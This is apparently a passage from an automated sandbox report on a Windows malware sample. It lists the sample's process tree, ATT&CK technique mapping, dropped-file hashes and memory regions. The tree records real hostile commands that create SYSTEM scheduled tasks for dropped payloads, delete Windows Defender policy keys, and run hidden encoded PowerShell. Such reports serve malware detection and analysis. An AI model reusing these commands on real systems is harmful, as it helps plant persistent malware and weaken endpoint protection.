                                                                                                                PID:4592
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "gyzoOcQeG"
                                                                                                                2⤵
                                                                                                                  PID:4392
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "GrrjjXtPjBVPFNmZQ" /SC once /ST 00:19:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\UcVrgCR.exe\" 76 /site_id 525403 /S" /V1 /F
                                                                                                                  2⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:4164
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /run /I /tn "GrrjjXtPjBVPFNmZQ"
                                                                                                                  2⤵
                                                                                                                    PID:2900
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:800
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    2⤵
                                                                                                                      PID:1080
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                    1⤵
                                                                                                                      PID:2368
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:2312
                                                                                                                      • C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\UcVrgCR.exe
                                                                                                                        C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\UcVrgCR.exe 76 /site_id 525403 /S
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks computer location settings
                                                                                                                        • Drops Chrome extension
                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4940
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /DELETE /F /TN "beNJzxXkYGhzSCmkZn"
                                                                                                                          2⤵
                                                                                                                            PID:4744
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                            2⤵
                                                                                                                              PID:2768
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:4816
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                2⤵
                                                                                                                                  PID:2600
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:1732
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CXdyuXxQU\burVNP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ErhcMqZyPKQzNnH" /V1 /F
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:1744
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /CREATE /TN "ErhcMqZyPKQzNnH2" /F /xml "C:\Program Files (x86)\CXdyuXxQU\oUCfMub.xml" /RU "SYSTEM"
                                                                                                                                    2⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:2984
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /END /TN "ErhcMqZyPKQzNnH"
                                                                                                                                    2⤵
                                                                                                                                      PID:2556
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /DELETE /F /TN "ErhcMqZyPKQzNnH"
                                                                                                                                      2⤵
                                                                                                                                        PID:3932
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "TzHNCgqXVcbCsT" /F /xml "C:\Program Files (x86)\YnFPtusxCOTU2\uMdskvM.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:3508
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "UfarzoSChLufz2" /F /xml "C:\ProgramData\RIEoyfpemMjlUPVB\AVYDpDE.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:3432
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "iQozJLGfyohvxjpyN2" /F /xml "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\hcbnfal.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:2256
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "ASXvXFEBgQcQQTYguNW2" /F /xml "C:\Program Files (x86)\LCSurMlfClMRC\LblWxKU.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:4780
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "NSdDFfEujjmGqHjBl" /SC once /ST 00:25:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MNBTbrbBidagOXts\ceqYosTk\VvUBcTb.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:1224
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /run /I /tn "NSdDFfEujjmGqHjBl"
                                                                                                                                        2⤵
                                                                                                                                          PID:4916
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                          2⤵
                                                                                                                                            PID:4928
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:2016
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                              2⤵
                                                                                                                                                PID:4844
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1804
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /DELETE /F /TN "GrrjjXtPjBVPFNmZQ"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4900
                                                                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MNBTbrbBidagOXts\ceqYosTk\VvUBcTb.dll",#1 /site_id 525403
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4924
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MNBTbrbBidagOXts\ceqYosTk\VvUBcTb.dll",#1 /site_id 525403
                                                                                                                                                      2⤵
                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:3340
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /DELETE /F /TN "NSdDFfEujjmGqHjBl"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4688

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                    Execution

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Persistence

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Privilege Escalation

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Credential Access

                                                                                                                                                    Credentials in Files

                                                                                                                                                    1
                                                                                                                                                    T1081

                                                                                                                                                    Discovery

                                                                                                                                                    Query Registry

                                                                                                                                                    4
                                                                                                                                                    T1012

                                                                                                                                                    System Information Discovery

                                                                                                                                                    4
                                                                                                                                                    T1082

                                                                                                                                                    Collection

                                                                                                                                                    Data from Local System

                                                                                                                                                    1
                                                                                                                                                    T1005

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Program Files (x86)\CXdyuXxQU\oUCfMub.xml
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      931154efce093667ef450bb78ba0f617

                                                                                                                                                      SHA1

                                                                                                                                                      97ac45f290906e5a628ec64833d142a7d1695a05

                                                                                                                                                      SHA256

                                                                                                                                                      42f3c09cc774bffb9f4bbde1ded6e8f2f117752dffe641213ec3339f0f1ad906

                                                                                                                                                      SHA512

                                                                                                                                                      21c08b2f8398009085480bf4c55567bc06fb47b73564e830da6bc6c618aa834c4375e2b5997837a5c9bf9d858a099173d6bf67cc8a1528428f3961c0492b5c4e

                                                                                                                                                    • C:\Program Files (x86)\LCSurMlfClMRC\LblWxKU.xml
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      d87a4c2d45f29699fe9ea3061a58b871

                                                                                                                                                      SHA1

                                                                                                                                                      ccff5ef3b150e43ae58a137f52c6534ef6e5af2b

                                                                                                                                                      SHA256

                                                                                                                                                      a7578ad6d9b9b1c764c99d158256abcc55dfc806bbf9edda36273534841bb57d

                                                                                                                                                      SHA512

                                                                                                                                                      5496e4d02b5dbe1e0fc1dc8e0750e1cd5d0fdb4a9546fdcdebc0c3f7b84c51bee77e551fbfb6009d85330a7f0d7b062bae0a9bfdb03e5cd5e2ba3269839d8437

                                                                                                                                                    • C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\hcbnfal.xml
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      e224b533fbaaf13863cce61b297cbfd5

                                                                                                                                                      SHA1

                                                                                                                                                      e4e18da4ccdfd054de2d9bba8c1c564ed0eddbdd

                                                                                                                                                      SHA256

                                                                                                                                                      320e79a05e435a163fa6ce5e0d8649453fd0744bd11f7d30045219797ab51d56

                                                                                                                                                      SHA512

                                                                                                                                                      dd74cdaa4d9c29dfb45641d10a274ba91ed93e51a725efbff047e77f9e7514b881a36e749de9385d920329e77c1f9537c5ca07c491f029095a53cce0377cd095

                                                                                                                                                    • C:\Program Files (x86)\YnFPtusxCOTU2\uMdskvM.xml
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      46e4a28eb664ad079c8180f2039da5cc

                                                                                                                                                      SHA1

                                                                                                                                                      85a10e1124dfd58229165402fbda9e0149225d0d

                                                                                                                                                      SHA256

                                                                                                                                                      f44881bbe399ca23efb75c973d0914c9e68605932464ddfa677b655cc094678e

                                                                                                                                                      SHA512

                                                                                                                                                      fbb41e2f017f928d5e64f840ae787ce3fe3a125f131de1e64150e3faa4d640169d8222d0ea3529896bf082caa63b5635872078718b407ad1fee1b3a58dc0b1d7

                                                                                                                                                    • C:\ProgramData\RIEoyfpemMjlUPVB\AVYDpDE.xml
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      d77597174f522feedb55e2016beee160

                                                                                                                                                      SHA1

                                                                                                                                                      e1f78f97e724442dadc63068b9c1c74718979a05

                                                                                                                                                      SHA256

                                                                                                                                                      2ed279561e1b4d4fa500748cf21919170ebc2eafbe0d935294c3169b48344c9e

                                                                                                                                                      SHA512

                                                                                                                                                      edd12770a03e4ba21eb44e60f19d7c4ad342775eb258a6131bd48797931045fb615cf65b705d452633f688a4edcecd450aae5cde09c8279805a8f181c851aadb

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                      SHA1

                                                                                                                                                      24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                      SHA256

                                                                                                                                                      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                      SHA512

                                                                                                                                                      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                      Filesize

                                                                                                                                                      64B

                                                                                                                                                      MD5

                                                                                                                                                      7274a07d1b80de6f66290b47588cee3b

                                                                                                                                                      SHA1

                                                                                                                                                      d926b384806c755fe6b9d03f68852765aabb5703

                                                                                                                                                      SHA256

                                                                                                                                                      5eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8

                                                                                                                                                      SHA512

                                                                                                                                                      b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS6900.tmp\Install.exe
                                                                                                                                                      Filesize

                                                                                                                                                      6.4MB

                                                                                                                                                      MD5

                                                                                                                                                      64dbdc73a8e158bf147fa1decf2ea1ad

                                                                                                                                                      SHA1

                                                                                                                                                      e6ca470ff427fca6aa88d28a15bfbf45de34a231

                                                                                                                                                      SHA256

                                                                                                                                                      9e3bbd6f91d4e6f7fa706dbadacfb01f09a57b19a969efdfe3214db4ed69c52a

                                                                                                                                                      SHA512

                                                                                                                                                      d60d8e67f04056c76c071f71e6396a6c56ecc9a690b21af7869120366a43b80fce2369f055d8b34ae42b8646c2d5f02eb477942456e9cada79378e7582a71bc8

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS6900.tmp\Install.exe
                                                                                                                                                      Filesize

                                                                                                                                                      6.4MB

                                                                                                                                                      MD5

                                                                                                                                                      64dbdc73a8e158bf147fa1decf2ea1ad

                                                                                                                                                      SHA1

                                                                                                                                                      e6ca470ff427fca6aa88d28a15bfbf45de34a231

                                                                                                                                                      SHA256

                                                                                                                                                      9e3bbd6f91d4e6f7fa706dbadacfb01f09a57b19a969efdfe3214db4ed69c52a

                                                                                                                                                      SHA512

                                                                                                                                                      d60d8e67f04056c76c071f71e6396a6c56ecc9a690b21af7869120366a43b80fce2369f055d8b34ae42b8646c2d5f02eb477942456e9cada79378e7582a71bc8

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS6BBF.tmp\Install.exe
                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                      MD5

                                                                                                                                                      f97416d14073c98a7bc58eaac2321c0f

                                                                                                                                                      SHA1

                                                                                                                                                      785c538f256d59bf6a986d04f9e1b2ffc9665ad7

                                                                                                                                                      SHA256

                                                                                                                                                      bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

                                                                                                                                                      SHA512

                                                                                                                                                      a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS6BBF.tmp\Install.exe
                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                      MD5

                                                                                                                                                      f97416d14073c98a7bc58eaac2321c0f

                                                                                                                                                      SHA1

                                                                                                                                                      785c538f256d59bf6a986d04f9e1b2ffc9665ad7

                                                                                                                                                      SHA256

                                                                                                                                                      bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

                                                                                                                                                      SHA512

                                                                                                                                                      a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\klRQIue.exe
                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                      MD5

                                                                                                                                                      f97416d14073c98a7bc58eaac2321c0f

                                                                                                                                                      SHA1

                                                                                                                                                      785c538f256d59bf6a986d04f9e1b2ffc9665ad7

                                                                                                                                                      SHA256

                                                                                                                                                      bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

                                                                                                                                                      SHA512

                                                                                                                                                      a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\klRQIue.exe
                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                      MD5

                                                                                                                                                      f97416d14073c98a7bc58eaac2321c0f

                                                                                                                                                      SHA1

                                                                                                                                                      785c538f256d59bf6a986d04f9e1b2ffc9665ad7

                                                                                                                                                      SHA256

                                                                                                                                                      bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

                                                                                                                                                      SHA512

                                                                                                                                                      a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                      Filesize

                                                                                                                                                      717B

                                                                                                                                                      MD5

                                                                                                                                                      ec8ff3b1ded0246437b1472c69dd1811

                                                                                                                                                      SHA1

                                                                                                                                                      d813e874c2524e3a7da6c466c67854ad16800326

                                                                                                                                                      SHA256

                                                                                                                                                      e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

                                                                                                                                                      SHA512

                                                                                                                                                      e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9
                                                                                                                                                      Filesize

                                                                                                                                                      503B

                                                                                                                                                      MD5

                                                                                                                                                      c10060ddb8b33344d5d2619c32f1629c

                                                                                                                                                      SHA1

                                                                                                                                                      6e869f5b2d13977c4ab4014094959c861b57790f

                                                                                                                                                      SHA256

                                                                                                                                                      728725273cc21072ccc206e0819b521944200dc11a3ae29c806a8962ffc9e8dd

                                                                                                                                                      SHA512

                                                                                                                                                      fcdd3b11eca2b97bc5f18f947f77c6425854c1d74a884ef3ba59fb794b7946ccd6d95d46a81a14785eb122bdcf8ad1714e34e9fc01e9abc3f3b83c11ffd2dd8f

                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                      Filesize

                                                                                                                                                      192B

                                                                                                                                                      MD5

                                                                                                                                                      5cf258f8c963f45a6e6558e0c656553d

                                                                                                                                                      SHA1

                                                                                                                                                      254a37ef74560a3b58e2759f2dc164fdab880d22

                                                                                                                                                      SHA256

                                                                                                                                                      aacd6ea4574caf8292667f72fa51b4a03433e5cda056c533b4f250c0c78c0baf

                                                                                                                                                      SHA512

                                                                                                                                                      98a5283d6887221e4f8829113ffb1e1719cddd65198b75d67b59ed99b2b8985aed50258738ccd6c3acb56c75063b8598ec5b6eb728deb0daa631ff97f30643a8

                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9
                                                                                                                                                      Filesize

                                                                                                                                                      560B

                                                                                                                                                      MD5

                                                                                                                                                      829cf272c4a7d7bc23c97b94a79f4997

                                                                                                                                                      SHA1

                                                                                                                                                      ad11610856aa194567a0595a81ba1b48bf6dfee8

                                                                                                                                                      SHA256

                                                                                                                                                      72d37ce84cd1eb384bfc690640bd1c0925d39a999e3c9613e12a14abebd13c4c

                                                                                                                                                      SHA512

                                                                                                                                                      b876c2ef5ebce294ad76869f869de3577fc8e4b06fca4e26c170f0438bd7368a7c58fde7cd03037467b4bd11cac9c1cca4009fdaee88d4092c760c0854228aab

                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                      SHA1

                                                                                                                                                      36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                      SHA256

                                                                                                                                                      b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                      SHA512

                                                                                                                                                      676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                      Filesize

                                                                                                                                                      11KB

                                                                                                                                                      MD5

                                                                                                                                                      3d4d17b69c28c5c74c99dc558923908d

                                                                                                                                                      SHA1

                                                                                                                                                      a6eed797056b93bcc8f396162f6370cdd996f333

                                                                                                                                                      SHA256

                                                                                                                                                      c22b268e8b29c38a5e6b57d9ddfe253b957afbbd8184e28e34b7f08120a5d2fd

                                                                                                                                                      SHA512

                                                                                                                                                      3e6c1f16008dca2c9c93f67e45ce8e6b79fb0be8fc53b591cfd9dd9fa54ddd0130d6ca18d42c9dceaa11bd9074f9897568f36d2c1b6d3a2e3c67346a6624635c

                                                                                                                                                    • C:\Windows\Temp\MNBTbrbBidagOXts\ceqYosTk\VvUBcTb.dll
                                                                                                                                                      Filesize

                                                                                                                                                      6.2MB

                                                                                                                                                      MD5

                                                                                                                                                      12dc3865ebd30712526e9c0d9d503212

                                                                                                                                                      SHA1

                                                                                                                                                      2a5e8f3c4b4cf288c6dcbd46c3211415e68064e7

                                                                                                                                                      SHA256

                                                                                                                                                      bac25acf25dcc8c5f404e61d0abb9b808555dbf136a2b010a4c457a3245f92ee

                                                                                                                                                      SHA512

                                                                                                                                                      c76bd014affefb7a2f3fbe89ff5175b90078238de55844caecfae210ee1847ad3481913f94361d4d425a882a3b81636f252e8f682a3d14895073922eb89275bf

                                                                                                                                                    • C:\Windows\Temp\MNBTbrbBidagOXts\ceqYosTk\VvUBcTb.dll
                                                                                                                                                      Filesize

                                                                                                                                                      6.2MB

                                                                                                                                                      MD5

                                                                                                                                                      12dc3865ebd30712526e9c0d9d503212

                                                                                                                                                      SHA1

                                                                                                                                                      2a5e8f3c4b4cf288c6dcbd46c3211415e68064e7

                                                                                                                                                      SHA256

                                                                                                                                                      bac25acf25dcc8c5f404e61d0abb9b808555dbf136a2b010a4c457a3245f92ee

                                                                                                                                                      SHA512

                                                                                                                                                      c76bd014affefb7a2f3fbe89ff5175b90078238de55844caecfae210ee1847ad3481913f94361d4d425a882a3b81636f252e8f682a3d14895073922eb89275bf

                                                                                                                                                    • C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\UcVrgCR.exe
                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                      MD5

                                                                                                                                                      f97416d14073c98a7bc58eaac2321c0f

                                                                                                                                                      SHA1

                                                                                                                                                      785c538f256d59bf6a986d04f9e1b2ffc9665ad7

                                                                                                                                                      SHA256

                                                                                                                                                      bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

                                                                                                                                                      SHA512

                                                                                                                                                      a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

                                                                                                                                                    • C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\UcVrgCR.exe
                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                      MD5

                                                                                                                                                      f97416d14073c98a7bc58eaac2321c0f

                                                                                                                                                      SHA1

                                                                                                                                                      785c538f256d59bf6a986d04f9e1b2ffc9665ad7

                                                                                                                                                      SHA256

                                                                                                                                                      bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

                                                                                                                                                      SHA512

                                                                                                                                                      a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

                                                                                                                                                    • C:\Windows\system32\GroupPolicy\Machine\Registry.pol
                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                      MD5

                                                                                                                                                      a6f315a184f2b1353e6c434790333bce

                                                                                                                                                      SHA1

                                                                                                                                                      14af82999ca588e61aeed6279391a509552aa1d3

                                                                                                                                                      SHA256

                                                                                                                                                      a6ac59399c65bfdfee8c791f07c64f67c3253ae9e6c9cb0e939a4b30add9dad8

                                                                                                                                                      SHA512

                                                                                                                                                      4c55c095b21a96cc58dae0ffae03c41f9778f0a438731c04c8f3ff1adc5a14f34a0fd4dc0be02131f2294c8f9de5c5bf698b2ae88854f9062ef51ea36f554f86

                                                                                                                                                    • C:\Windows\system32\GroupPolicy\gpt.ini
                                                                                                                                                      Filesize

                                                                                                                                                      268B

                                                                                                                                                      MD5

                                                                                                                                                      a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                      SHA1

                                                                                                                                                      1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                      SHA256

                                                                                                                                                      9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                      SHA512

                                                                                                                                                      9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                    • memory/216-152-0x00007FFE4E220000-0x00007FFE4ECE1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/216-154-0x00007FFE4E220000-0x00007FFE4ECE1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/216-151-0x00000145F72B0000-0x00000145F72D2000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/444-171-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/564-205-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/724-202-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/780-178-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/800-219-0x00007FFE4D050000-0x00007FFE4DB11000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/832-153-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/948-189-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1080-218-0x0000000000000000-mapping.dmp
